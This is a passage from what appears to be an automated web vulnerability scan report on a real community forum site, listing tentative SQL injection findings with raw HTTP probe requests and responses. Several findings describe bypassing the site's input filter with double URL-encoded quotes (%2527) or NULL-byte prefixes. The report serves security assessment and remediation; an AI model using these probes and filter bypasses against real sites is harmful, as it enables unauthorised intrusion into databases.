HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Location: https://secure.skype.com/login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&redirectreason=notregistered&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2Fnotifications%2Fnotifymoderatorpage%2Fmessage-uid%2F25246%3F1%2500%2527%2527%3D1
Content-Length: 0
Connection: close
Content-Type: text/plain


1.37. http://community.skype.com/t5/tag/Mac/tg-p/category-id/English [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Mac/tg-p/category-id/English

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 129995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Mac" i
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag%2527%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.38. http://community.skype.com/t5/tag/Subscription/tg-p/category-id/English [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Subscription/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 132955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Subscr
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Video/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Video/tg-p/category-id/English?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/Video/tg-p/category-id/English?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Video"
...[SNIP]...

1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/call/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/call/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/call/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "call"
...[SNIP]...

1.41. http://community.skype.com/t5/tag/crash/tg-p/category-id/English [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/crash/tg-p/category-id/English

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/crash/tg-p/category-id/English%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 35824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Node 0 was N
...[SNIP]...
<link href="http://community.skype.com/t5/errors/errorpage/tag-name/crash/tag-id/32/category-id/English%27" rel="canonical">
...[SNIP]...
<div class="exception-page-message NoSuchNodeException lia-component-content" class="exception-page-message NoSuchNodeException">
...[SNIP]...

Request 2

GET /t5/tag/crash/tg-p/category-id/English%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/error/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/error/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/error/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "error"
...[SNIP]...

1.43. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/spanish/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "spanis
...[SNIP]...

1.44. http://community.skype.com/t5/user/viewprofilepage/user-id/165954 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165954

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.45. http://community.skype.com/t5/user/viewprofilepage/user-id/165958 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165958

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/user/viewprofilepage'/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage''/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.46. http://community.skype.com/t5/user/viewprofilepage/user-id/59914 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/59914

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.47. http://community.skype.com/t5/user/viewprofilepage/user-id/8 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/8

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

